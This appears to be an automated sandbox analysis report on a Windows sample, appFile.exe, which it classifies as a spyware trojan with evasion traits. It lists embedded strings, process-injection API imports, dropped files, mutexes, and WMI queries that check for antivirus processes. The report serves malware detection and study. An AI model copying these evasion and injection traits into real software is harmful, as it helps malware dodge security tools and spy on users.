      Source: appFile.exeBinary or memory string: OriginalFilenameeqossnap.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameStorProp.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdatt.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenametapisysprep.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSIDENT.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIR41_QCX.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameICONCODESERVICE.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCMCFG32.DLL` vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSQLWID.DLLJ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.OracleClient.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamenetbios.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMMRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMic vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamesas.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameLICMGR10.DLLD vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameNDDEAPI.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.SqlXml.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIFSUtilX.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIcmUi.Dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSJINT40.DLLD vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameTTDLoader.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameicmp.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepwrshplugin.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameInstallUtil.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameRdpSaPs.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewmdrmsdk.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSQLWOA.DLLJ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data. vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSetIEInstalledDateAI.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewinml.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCLBj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIR50_QCX.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.DirectoryServices.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMshtmlDac.dllD vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepshed.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemicrosoft.visualbasic.compatibility.data.resources. vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSCAT32 Forwarder DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsda vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamews2help.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameVBAJET32.DLLp( vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCommsLanguageUtil.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsafd.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUNIPLAT.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilename"msrating.DYNLINK"j% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameifmon.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameoddbse32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Web.Services.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamegrouptrusteeai.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMapControlStringsRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamePaymentMediatorServiceProxy.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMORICONS.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepwrshmsg.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameaspnet_compiler.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamerasctrs.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameaspnet_regbrowsers.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameir50_qcx.dllr) vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCVTRESUI.DLL^ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Drawing.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSyncInfrastructureeps.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamesystem.management.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.ServiceProcess.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCMSTPLUA.DLL` vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameCMUTIL.DLL` vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameJSC.resources.dllF vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.Services.Design.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Management.Instrumentation.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodbcji32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSixDofControllerManager.ProxyStubs.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMicrosoft.Build.Utilities.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSoftpub Forwarder DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameinetmib1.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaprsr.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.Entity.Design.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIR50_32.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaenum.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamernr20.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewinrsmgr.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameztrace_maps.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameshfolder.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamePhoneUtilRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Web.Entity.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsad vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMFVFW.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameVDMDBGj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewshunix.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Formatters.Soap.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Security.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Runtime.Remoting.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameTimeDateMUICallback.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameaspne6: vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewmcodecdspps.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSERIALUI.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameOLEACCRC.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemagnification.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWalletBackgroundServiceProxyj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamesvcext.dll\ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewlstore.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUMDMXFRM.DRVj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepcwum.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemrt100.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewmiprop.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameriched32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewlanutil.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodfox32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsorc32r.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamealinkui.dll^ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameADDRESSPARSER.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepeerdistai.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSpeechDesktopPS.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameNcdProp.dll^ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.XML.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenametapi Windows vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameASPPERF.DLLH vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamelaprxy.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamePhotoBase.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUXLibRes.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamevpnikeapi.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameLICMGR10.Drporation. All rights reserved.B vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSSIGN32.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMicrosoft.Msmq.PowerShell.Commands.resources.dll~/ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameir41_qc.dll vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIMPLATSETUP.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSyncHostps.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIR41_QC.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenametxfw32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamerpcns4.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSHPAFACT.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameEdmGen.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilename.dll.MapViewOfFileMapViewOfFileExkernel32.dll.MapViewOfFileExOpenFileMappingWkernel32.dll.OpenFileMappingWReadProcessMemorykernel32.dll.ReadProcessMemoryUnmapViewOfFilekernel32.dll.UnmapViewOfFileVirtualAllockernel32.dll.VirtualAllocVirtualAllocExkernel32.dll.VirtualAllocExVirtualFreekernel32.dll.VirtualFreeVirtualFreeExkernel32.dll.VirtualFreeExVirtualProtectkernel32.dll.VirtualProtectVirtualProtectExkernel32.dll.VirtualProtectExVirtualQuerykernel32.dll.VirtualQueryVirtualQueryExkernel32.dll.VirtualQueryExWriteProcessMemorykernel32.dll.WriteProcessMemory vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameExtrasXmlParser.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdE vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsadcor.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSHUNIMPL.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameVSSPROV.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamentlanui2.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWSClient.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameWINSYNC.DLLh$ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameDaOtpCredentialProvider.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Data.DataSetExtensions.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Web.Entity.Design.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamecca.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Configuration.Install.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSOFTKBD.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemrt_map.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameLZ32.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Drawing.Design.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamerdpbase.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemgmtapi.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsdaurl.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodexl32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMSHTMLER.DLLD vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameVirtualDisplayManager.ProxyStubs.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSYSSETUP.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemscorees.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIMTCTRLN.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodbcjt32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameFeatureSettingsOverride.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSPWINSAT.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIPMIPRV.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUserDataAccessRe vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSERWVDRV.DLLj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameodbcbcp.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMicrosoft.BitLocker.Structures.dllv+ vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameUsbui.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameIA2ComProxy.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsadcer.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewsock32.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemprext.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamesnmpapi.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameloghours.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameSystem.Transactions.resources.dllT vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamewcp.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenameMicrosoft.Da vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamemsiltcfg.dllX vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamePerceptionSimulation.ProxyStubs.dllj% vs appFile.exe
      Source: appFile.exeBinary or memory string: OriginalFilenamepsDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD vs appFile.exe
      Source: appFile.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: appFile.exeBinary string: ComponentIdBTH\MS_BTHPANNdi\InterfacesUpperRangendis4ndis5ndis5_ipndis4bdandis1394LowerRangeLocalTalkNetCfgInstanceIdCharacteristics\Device\SOFTWARE\Microsoft\Windows NT\CurrentVersion\KERNEL32.dllPresentationNative_v0400.dllwpfgfx_v0400.dllWindowsCodecs.dllWindowsCodecsExt.dllole32.dllmscms.dllninput.dllpenimc2_v0400.dllmshwgst.dllshfolder.dllurlmon.dllkernel32.dllVCRUNTIME140_CLR0400.dllucrtbase_clr0400.dllADVAPI32.dllSHLWAPI.dllmscorlibWindowsBaseSystem.XamlUIAutomationTypesSystem.ConfigurationSystem.Windows.Input.ManipulationsUIAutomationProviderSystem.XmlSystem.DeploymentCallConvStdcallSystem.Runtime.CompilerServicesCallConvCdeclNativeCppClassAttributeObjectSecurityCriticalAttributeSystem.SecurityDateTimeIsConstUnsafeValueTypeAttributeValueTypeIsSignUnspecifiedByteSecurityTreatAsSafeAttributeCLSCompliantAttributeUriByteIsLongSecuritySafeCriticalAttributeSecurityPermissionAttributeSystem.Security.PermissionsSecurityActionIsExplicitlyDereferencedIsImplicitlyDereferencedGuidPermissionSetWebExceptionSystem.NetSecurityExceptionFlagsAttributePointIsBoxedSecurityCriticalScopeIDisposableIDictionary`2System.Collections.GenericCultureInfoSystem.GlobalizationKeyValuePair`2ICollection`1IEnumerator`1IEnumeratorSystem.CollectionsDefaultMemberAttributeSystem.ReflectionIEnumerableIEnumerable`1UnmanagedMemoryStreamGuidAttributeSystem.Runtime.InteropServicesInterfaceTypeAttributeComInterfaceTypeStreamComVisibleAttributeClassInterfaceAttributeClassInterfaceTypeList`1IList`1MulticastDelegateIAsyncResultAsyncCallbackCriticalHandleDictionary`2FILETIMESystem.Runtime.InteropServices.ComTypesThreadStaticAttributeDispatcherOperationSystem.Windows.ThreadingReliabilityContractAttributeSystem.Runtime.ConstrainedExecutionConsistencyCerStringIntPtrArgumentOutOfRangeExceptionUInt32GCHandleUInt16Int32DecoratedNameAttributeMarshalMathGCHandleTypeSeekOriginOverflowExceptionDoubleNumberStylesIFormatProviderDispatcherActionDelegateThreadSystem.ThreadingGCRuntimeTypeHandleDebugSystem.DiagnosticsInvalidOperationExceptionNotImplementedExceptionInvariantNotSupportedExceptionInterlockedPermissionStateFileFormatExceptionUnauthorizedAccessExceptionFileNotFoundExceptionFixedAddressValueTypeAttributeMonitorBaseAppContextSwitchesRuntimeHelpersAssemblyAttributesGoHereSMDisableDpiAwarenessAttributeSuppressUnmanagedCodeSecurityAttributeAssemblyOperatingSystemAttributeWin32ExceptionSystem.ComponentModelPathTooLongExceptionDllNotFoundExceptionEnvironmentDependencyAttributeLoadHintAssemblyAttributesGoHereMAssemblyAttributesGoHereAllowPartiallyTrustedCallersAttributeSecurityRulesAttributeSecurityRuleSetAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyDefaultAliasAttributeAssemblyCompanyAttributeAssemblyProductAttrib
      Source: appFile.exeBinary or memory string: 5XIp.sln /t:Rebuild /p:Configuration=Release
      Source: appFile.exeBinary or memory string: .SLN
      Source: appFile.exeBinary or memory string: , MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU")
      Source: appFile.exeBinary or memory string: MSBuild MyApp.csproj /t:Clean
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@82/35@6/3
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeMutant created: \Sessions\1\BaseNamedObjects\FSCapture
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2024:120:WilError_03
      Source: C:\Users\user\Desktop\appFile.exeFile created: C:\Users\user\AppData\Local\Temp\nsaA4F0.tmpJump to behavior
      Source: appFile.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: appFile.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 47.14%
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
      Source: C:\Users\user\Desktop\appFile.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
      Source: appFile.exeVirustotal: Detection: 14%
      Source: appFile.exeString found in binary or memory: caspol -addfulltrust <
      Source: appFile.exeString found in binary or memory: caspol -addgroup <
      Source: appFile.exeString found in binary or memory: caspol -addpset { <
      Source: appFile.exeString found in binary or memory: Failed to re-install supersed versions for package: %S
      Source: appFile.exeString found in binary or memory: ft\Windows\CurrentVersion\Explorer\PostBootRemindersFailed to allocate post-boot reminder registry key.RegCreateKeyExW failed.Failed to allocate string for post-boot reminder registry key with SID.TitleRegCreateKeyExW failed again.TextShowTimeRetryCountRetryIntervalTypeFlagsm_sczOwnerStringonecore\base\cbs\core\CbsUpdate.hExec: Processing canceled. Client: %S, Session: %u_%u, Package: %SExec: Failed to get root store object for delayed packages.Failed to get task target package and statesExec: Failed deleting pending state for delayed package.Exec: Failed setting pending state for delayed package.Failed to add a new phase.Exec: Simple Processing started. Client: %S, Session: %S, Package: %S, Identifier: %wsFailed to add capability task.Failed to add execution task.Exec: Install uninstall skipped on simple execution, this is not expected.Scavenge: Failed to initialize scavenge operation execution objectScavenge: Failed to allocate execution object.Perf: Resolve chain started.Scavenge FailedPerf: Resolve chain started.Failed to create CSI transaction for resolving.Failed to bulk stage deployment manifest and pin deployment for package:%SFailed to complete component closurePerf: Ready for complete Component closure.Exec: Failed to commit CSI transaction to resolve execution chain.Exec: Unexpected disposition from CSI transaction to resolve execution chain: %dPerf: Resolve chain complete.Perf: Resolve chain complete.Failed to persist package: %SCommitPackagesState: Started persisting state of packagesCommitPackagesState: Completed persisting state of packagesProgress handler returned failure while storing package, continuing to finish storage then will return the failure.Failed to get next package to re-evaluateFailed to add package to execution for package:%SFailed to get intended state of package: %SFailed to execute execution package: %SFailed to prepare execution.Plan: Could not resolve package: %S, but the intended state is absent, therefore skip it.Failed to enumerate edition packagesFailed to add edition package.More than one active editions will be installed on systemFailed to get source OS version.arrPackageIdentities.GetSize() == arrCapabilityIdenties.GetSize()No 